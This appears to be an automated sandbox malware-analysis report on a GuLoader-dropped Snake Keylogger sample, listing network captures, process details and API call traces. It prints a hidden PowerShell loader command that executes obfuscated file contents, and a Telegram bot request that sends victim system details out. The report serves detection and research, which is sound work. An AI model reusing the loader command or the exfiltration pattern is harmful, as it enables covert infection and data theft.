3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	50020	104.21.112.1	443	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:11:37 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:11:37 UTC	860	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:11:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1861886 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uWoVS3F3wI1P%2FeZuk8QQ7c2H5AVutp2rt1%2FlUZ3R9XtPvceiQlhJHNLS55HSS8omyvywrv6emwhS3H%2FVRaP%2FCPvmnlwQsEpQM6XDXW0UrN8Y16ncsjb%2BQ4gtcQTahDj%2BxzsV12N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900000fefeab43b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1630&rtt_var=971&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=950830&cwnd=203&unsent_bytes=0&cid=3873d05d7407eaf2&ts=133&x=0"
2025-01-10 22:11:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50021	149.154.167.220	443	3192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:11:38 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:46:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-10 22:11:38 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 22:11:38 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:11:38 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	17:09:35
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\4Vx2rUlb0f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\4Vx2rUlb0f.exe"
Imagebase:	0x400000
File size:	779'915 bytes
MD5 hash:	A1204C6A7FE28BAB5DB0E3240513A857
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:09:35
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) "
Imagebase:	0xa60000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2706856166.000000000A8B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:09:35
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:11:04
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xab0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3052249542.0000000025251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.2%
Total number of Nodes:	1310
Total number of Limit Nodes:	39

Executed Functions

Function 004032A0 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004032C3
GetVersion.KERNEL32 ref: 004032C9
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032F2
#17.COMCTL32(00000007,00000009), ref: 00403315
OleInitialize.OLE32(00000000), ref: 0040331C
SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 00403338
GetCommandLineW.KERNEL32(Windowlet Setup,NSIS Error), ref: 0040334D
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000000), ref: 00403360
CharNextW.USER32(00000000,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000020), ref: 00403387

Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D2
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034DE
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F2
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FA
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
DeleteFileW.KERNELBASE(1033), ref: 00403527

Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Windowlet Setup,NSIS Error), ref: 0040605D

OleUninitialize.OLE32(?), ref: 004035F2
ExitProcess.KERNEL32 ref: 00403613
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000000,?), ref: 00403626
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000000,?), ref: 00403635
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000000,?), ref: 00403640
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000000,?), ref: 0040364C
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403668
DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?), ref: 004036C2
CopyFileW.KERNEL32(C:\Users\user\Desktop\4Vx2rUlb0f.exe,0042AA08,00000001), ref: 004036D6
CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000), ref: 00403703
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403732
OpenProcessToken.ADVAPI32(00000000), ref: 00403739
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
AdjustTokenPrivileges.ADVAPI32 ref: 00403771
ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
ExitProcess.KERNEL32 ref: 004037B9

Strings

C:\Users\user\Desktop, xrefs: 00403645, 0040364A, 00403677
SeShutdownPrivilege, xrefs: 00403748
UXTHEME, xrefs: 004032E6, 004032EB, 004032F1
NSIS Error, xrefs: 0040333E
~nsu, xrefs: 0040361E
TEMP, xrefs: 00403506
1033, xrefs: 00403522
C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer, xrefs: 004035CF
TMP, xrefs: 0040350E
.tmp, xrefs: 0040363A
Windowlet Setup, xrefs: 00403343
Error launching installer, xrefs: 004035A9
C:\Users\user\AppData\Local\Temp\, xrefs: 004034B6, 004034BB, 004034D1, 004034DD, 004034EC, 004034F9, 00403505, 0040350D, 00403623, 00403634, 0040363F, 0040364B, 00403658, 00403667, 00403718
Low, xrefs: 004034F4
C:\Users\user\Desktop\4Vx2rUlb0f.exe, xrefs: 004036D1
C:\Users\user\AppData\Local\neoimpressionism, xrefs: 004034A4, 004035C4, 0040366E, 00403678
\Temp, xrefs: 004034D8
"C:\Users\user\Desktop\4Vx2rUlb0f.exe", xrefs: 00403353, 00403359, 0040354F

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\neoimpressionism$C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer$C:\Users\user\Desktop$C:\Users\user\Desktop\4Vx2rUlb0f.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Windowlet Setup$\Temp$~nsu
API String ID: 2488574733-3340326761
Opcode ID: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
Instruction ID: bc0dc6ca93ec9440221f6a1154d69e62cad873230aa3e7f423b6c7eed9202452
Opcode Fuzzy Hash: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
Instruction Fuzzy Hash: 60D1F470600300ABE710BF759D45B2B3AADEB8074AF51443FF581B62E1DB7D8A458B6E

Function 004052EE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040534C
GetDlgItem.USER32(?,000003EE), ref: 0040535B
GetClientRect.USER32(?,?), ref: 00405398
GetSystemMetrics.USER32(00000002), ref: 0040539F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F2
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405405
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405427
ShowWindow.USER32(?,00000008), ref: 0040543B
GetDlgItem.USER32(?,000003EC), ref: 0040545C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040546C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405485
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405491
GetDlgItem.USER32(?,000003F8), ref: 0040536A

Part of subcall function 00404149: SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157

GetDlgItem.USER32(?,000003EC), ref: 004054AE
CreateThread.KERNELBASE(00000000,00000000,Function_00005282,00000000), ref: 004054BC
CloseHandle.KERNELBASE(00000000), ref: 004054C3
ShowWindow.USER32(00000000), ref: 004054E7
ShowWindow.USER32(0001048E,00000008), ref: 004054EC
ShowWindow.USER32(00000008), ref: 00405536
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556A
CreatePopupMenu.USER32 ref: 0040557B
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040558F
GetWindowRect.USER32(?,?), ref: 004055AF
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055C8
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405600
OpenClipboard.USER32(00000000), ref: 00405610
EmptyClipboard.USER32 ref: 00405616
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405622
GlobalLock.KERNEL32(00000000), ref: 0040562C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405640
GlobalUnlock.KERNEL32(00000000), ref: 00405660
SetClipboardData.USER32(0000000D,00000000), ref: 0040566B
CloseClipboard.USER32 ref: 00405671

Strings

{, xrefs: 00405554

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
Instruction ID: 691c8e7aa241a152ccc1fa1da29986a8db7386483fecbbc97dabe6f77f48909a
Opcode Fuzzy Hash: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
Instruction Fuzzy Hash: D4B14971800608BFDB119FA0DD89EAE7B79FB48355F00803AFA41BA1A0CB755E51DF68

Function 00406072 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Completed,?,004051E6,Completed,00000000,00000000,0041C400), ref: 00406135
GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004061B3
GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004061C6
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406202
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406210
CoTaskMemFree.OLE32(?), ref: 0040621B
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040623F
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051E6,Completed,00000000,00000000,0041C400), ref: 00406299

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406239
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406181
Completed, xrefs: 00406097
: Completed, xrefs: 0040609C, 0040617C, 0040619D, 004061B2, 004061C5, 004061E1, 0040620C, 0040623E, 00406244, 0040625E, 00406272, 00406292, 00406298, 004062A4, 004062D7

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-905382516
Opcode ID: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
Instruction ID: 6a0e75f8176bdfaa808a817e977aa907b1c5d4b6119349843486ba00336cef2a
Opcode Fuzzy Hash: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
Instruction Fuzzy Hash: 45611E71A00105ABDF20AF65CC41AEE37A5EF45314F12817FE852BA2D0D73D8AA1CB4D

Function 00405841 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040586A
lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B2
lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058D5
lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DB
FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058EB
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040598B
FindClose.KERNEL32(00000000), ref: 0040599A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040584E
\*.*, xrefs: 004058AC
"C:\Users\user\Desktop\4Vx2rUlb0f.exe", xrefs: 00405841

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3499683673
Opcode ID: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
Instruction ID: caf420165dc21d0a99f0983ed575dd8be70d76c6b9b5ff92ec706b465e099e4b
Opcode Fuzzy Hash: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
Instruction Fuzzy Hash: DB41B171800A14EADB21AB65CD49BBF7678EF85764F10423BF801B11D1D77C4A82DE6E

Function 00406393 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(74DF3420,00430298,0042FA50,00405B55,0042FA50,0042FA50,00000000,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040639E
FindClose.KERNEL32(00000000), ref: 004063AA

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
Instruction ID: 351587cf9ce3a522800e1c73501a9738d9f8821b35168cd3fdb078f4a7df3edc
Opcode Fuzzy Hash: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
Instruction Fuzzy Hash: C2D012315081209BC34157787E0C84B7B5C9F1A3317259F36F96AF12E1CB348C2286DC

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
Instruction ID: 34d4ac1ca0ba7345d9811ef03afe410f99a72e11e7e6ea98f315d3ade0c6d005
Opcode Fuzzy Hash: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
Instruction Fuzzy Hash: 32F08C71A012149BDB01EBA4DE49AAEB378FF45324F20457BE105F21E1E7B89A409B29

Function 00403C3C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C78
ShowWindow.USER32(?), ref: 00403C95
DestroyWindow.USER32 ref: 00403CA9
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CC5
GetDlgItem.USER32(?,?), ref: 00403CE6
